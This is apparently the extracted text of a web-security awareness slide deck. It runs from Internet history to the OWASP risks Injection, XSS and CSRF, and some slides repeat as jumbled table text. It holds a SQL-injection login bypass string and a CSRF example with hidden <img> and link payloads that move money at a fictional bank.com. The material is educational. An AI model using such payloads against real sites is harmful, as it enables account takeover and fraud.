  • 4. in the beginning... Vinton Gray Cerf Robert Elliot Kahn … a.k.a. the “Internet fathers”
  • 5. The Internet was created… … as an ubiquitous … decentralized … standardized … global … interconnected … digital … communications channel.
  • 6. in the beginning... (Sir) Tim Berners Lee … a.k.a. the “WWW father”
  • 7. The WWW was created! A system of interlinked hypertext documents accessed via the Internet. Infinite worldwide knowledge access.
  • 9. evolving, growing network Small data part on Large amounts of Data on the Cloud a specific web-site data on a large (or limited number number of sites Applications on the of web-sites) Applications on the Web and Cloud desktop and Web Applications on the (more and more) Data almost desktop Part of the data inexistent on the Most data is on the still on desktop desktop (still on desktop (but also mobile) mobile) Data processing on Data processing on Data processing the desktop the desktop, but almost inexistent also on the web user
  • 10. evolving, growing network Small data part on Large amounts of Data on the Cloud a specific web-site data on a large (or limited number number of sites Applications on the of web-sites) Applications on the Web and Cloud desktop and Web Applications on the (more and more) Data almost desktop Part of the data inexistent on the Most data is on the still on desktop desktop (still on desktop (but also mobile) mobile) Data processing on Data processing on Data processing the desktop the desktop, but almost inexistent also on the web user
  • 11. evolving, growing network Small data part on Large amounts of Data on the Cloud a specific web-site data on a large (or limited number number of sites Applications on the of web-sites) Applications on the Web and Cloud desktop and Web Applications on the (more and more) Data almost desktop Part of the data inexistent on the Most data is on the still on desktop desktop (still on desktop (but also mobile) mobile) Data processing on Data processing on Data processing the desktop the desktop, but almost inexistent also on the web user
  • 12. security++   what do we have today?   anti-virus   anti-malware   anti-spyware   firewalls   intrusion detection systems   …   are they enough?
  • 13. security++   YES, but…   dothey protect the user from the web applications?   cana Web application be compromised to hurt legitimate users?   sure it can.
  • 14. security++   How?   Do you trust your favorite web-applications?   Google   Gmail   Doyou trust your favorite social-web applications?   Facebook   Twitter   Do you trust your homebanking?   Do you trust your government web-sites?
  • 15. security++ The security perimeter has huge security holes in the application Application Layer layer Legacy Systems Human Resrcs Web Services Directories Custom Developed Databases Application Code Billing APPLICATION ATTACK App Server Web Server Network Layer Hardened OS Firewall Firewall
  • 17. security trends problem types typical problems on web apps
  • 18. the security risks http://www.owasp.org/index.php/Top_10
  • 19. security risks   considering the three most important   A1: Injection   A2: Cross Site Scripting (XSS)   A5: Cross Site Request Forgery (CSRF)
  • 20. A1: Injection what if?
  • 21. A1: Injection what if? SELECT * FROM users usr WHERE usr.username = ‘admin’;--’ AND usr.password=’bb21158c733229347bd4e681891e213d94c685be’
  • 22. A1: Injection what if?
  • 23. any input from the web app user can be an attack vector
  • 24. A2: Cross Site Scripting (XSS)   injecting malicious payload on the web app from the end-user side to be redirected to other users (victims)
  • 25. A2: Cross Site Scripting (XSS) 1 Attacker sets the trap – update my profile Application with stored XSS Attacker enters a vulnerability malicious script into a web page that stores the data on the server Knowledge Mgmt Communication Administration Bus. Functions E-Commerce Transactions 2 Victim views page – sees attacker profile Accounts Finance Custom Code Script runs inside victim’s browser with full access to the DOM and cookies 3 Script silently sends attacker Victim’s session cookie
  • 26. A5: Cross Site Request Forgery (CSRF)   an attacker can build its own malicious website and initiate request on the user’s browser
  • 27. A5: Cross Site Request Forgery (CSRF) Attacker sets the trap on some website on the internet 1 (or simply via an e-mail) Application with CSRF Hidden <img> tag vulnerability contains attack against vulnerable site Knowledge Mgmt Communication Administration Bus. Functions Transactions E-Commerce Accounts Finance While logged into vulnerable site, 2 victim views attacker site Custom Code 3 Vulnerable site sees <img> tag loaded by legitimate request browser – sends GET from victim and request (including performs the action credentials) to requested vulnerable site
  • 28. A5: Cross Site Request Forgery (CSRF) Alice transfer 100€ to Bob Bob through bank.com POST http://bank.com/transfer.do HTTP/1.1 ... ... ... Content-Length: 19; acct=BOB&amount=100 realizes that the same bank.com web application can execute Pirate the transfer using a URL with parameters GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1 will try to use Alice to transfer 100.000€ to its own account http://bank.com/transfer.do?acct=MARIA&amount=100000 sends an HTML email to Alice with an URL to click <a href="http://bank.com/transfer.do?acct=MARIA&amount=100000">View my Pictures!</a> or, sends an HTML email to Alice with a image to hide the attack <img src="http://bank.com/transfer.do?acct=MARIA&amount=100000" width="1" height="1" border="0"> Alice if Alice is authenticated at bank.com with an active session the transfer is performed
  • 29. consequences This is serious!!! And we are just looking at the tip of the iceberg!
  • 30. [quick] conclusions   Extra-care with the web applications you trust your data   Extra-care on the way you handle your email   Always act suspicious upon something “strange” on the web   WebApp developers take care on what you do – your code is part of the security perimeter